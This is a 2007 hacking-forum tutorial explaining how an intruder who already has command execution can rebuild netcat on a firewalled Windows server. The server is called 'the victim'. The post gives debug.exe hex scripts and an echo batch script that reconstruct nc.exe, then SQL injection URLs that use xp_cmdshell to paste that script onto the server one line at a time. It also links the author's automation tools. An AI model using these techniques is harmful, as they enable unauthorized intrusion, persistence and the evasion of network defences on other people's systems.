Forums > Creating Files When It's Not Possible To Transfer Them

Full Version: Creating Files When It's Not Possible To Transfer Them

SuRGeoN

Jul 14 2007, 08:52 PM

[SOF]
=============================================================================
Creating files When it's not possible to Transfer them
by SuRGeoN
=============================================================================
14/07/2007

Some times hackers want to tranfer files to the victim's server but they blocked by a firewall.
In this scenario they will try to create the file to the server rather to upload the file. This
idea has two steps:

=====================================================
1) Converting the file propertly for Windows debugger
=====================================================

Windows debugger has the ability to create a binary (.dll) file up to 64kbytes by parsing
parameters like hex values and addresses that we want to write the data. So, we can "send" only
text to the victim and then we can converted to binary with the windows debugger. For example
we want to create netcat (nc.exe) to the victim's server.

We have to create a text file propertly for windows debugger...

CODE

n z9.dll
e 0100
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 ...
e 0180
50 45 00 00 4c 01 04 00 b9 8e ae 34 00 00 00 00 00 ...
e 0200
00 20 01
...
e e800
47 65 74 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c ...
e e880
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...
e e900
r cx
e800
w
q

This is an example for how we can create netcat (nc.exe) with the debugger. Above we can see
some commands that tell to the debugger to create z9.dll with the data (hex) of the netcat. So
we can create a batch script that it'll create a file with all these commands and then it will
parse them to the debugger.

An example for a batch script (nc.exe) ...

CODE

echo off && echo n z9.dll >z9
echo e 0100 >> z9 && echo 4d 5a 90 00 03 00 00 ... >>z9
echo e 0180 >> z9 && echo 50 45 00 00 4c 01 04 ... >>z9
echo e 0200 >> z9 && echo 00 20 01 00 3c 00 00 ... >>z9
...
echo e e800 >> z9 && echo 47 65 74 4e 75 6d 62 ... >>z9
echo e e880 >> z9 && echo 00 00 00 00 00 00 00 ... >>z9
echo e e900 >> z9 && echo >>z9
echo r cx >>z9 && echo e800 >>z9 && echo w >>z9 &&
echo q >>z9 && debug<z9 && copy z9.dll z91.tmp &&
del z9.dll && del z9 && copy z91.tmp nc.exe

It will create the data (commands for debugger with hex values for netcat) to a file with name z9
and then it will parse it to the debugger (debug<z9). The result it'll be a file z9.dll and if we
rename it to nc.exe then we have the original nc.exe.

For this scenario I created a tool srgn-file2text that it automates these step. You 'll give
a file for input and you will take the text file propertly for Windows debugger. It supports files
more than 64kbytes.

Example with srgn-file2text in this scenario: "srgn-file2text.exe nc.exe nc.bat"

download -> http://surgeon.gotdns.org/show.php?cid=2&aid=38

More info for Windows Debugger
---------------------------------------------------------
http://www.geocities.com/thestarman3/asm/debug/debug2.htm
http://www.datastronghold.com/archive/t14768.html
http://old.bsrf.org.uk/tutorials/debug.html
---------------------------------------------------------

===================================================
1) Pasting line by line text to the victim's server
===================================================

So we have the text file ready but how we can use it to create the original file to the victim's server ?

We supposed that we have already access to execute commands to the server but we cannot tranfer files
(neither tftp,ftp,wget etc). So we can create the file by pasting line by line the above text to the
victim's server. To understand better this idea we supposed that we can execute commands with the help
of xp_cmdshell function. Example...

http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell '<command>';--

So if we do the next request we will create the netcat (nc.exe) to the server...

CODE

http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo off && echo n z9.dll >z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0100 >> z9 && echo 4d ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0180 >> z9 && echo 50 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e 0200 >> z9 && echo 00 ... >>z9';--
...
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e800 >> z9 && echo 47 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e880 >> z9 && echo 00 ... >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo e e900 >> z9 && echo >>z9';--
http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell 'echo r cx >>z9 && echo e800 >>z9 && echo w >>z9
&& echo q >>z9 && debug<z9 && copy z9.dll z91.tmp
&& del z9.dll && del z9 && copy z91.tmp nc.exe ';--

For this scenario I created a tool srgn-httprequests that it automates these step. You 'll give
the START of url (text), the MIDDLE of url (file) and the END of url (text).

Example with srgn-httprequests fill textboxes with these:
START -> http://www.victim.com/news.asp?id=1;exec master..xp_cmdshell '
MIDDLE -> c:\nc.bat
END -> ';--

download -> http://surgeon.gotdns.org/show.php?cid=2&aid=39

=============================================================================
[EOF]

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.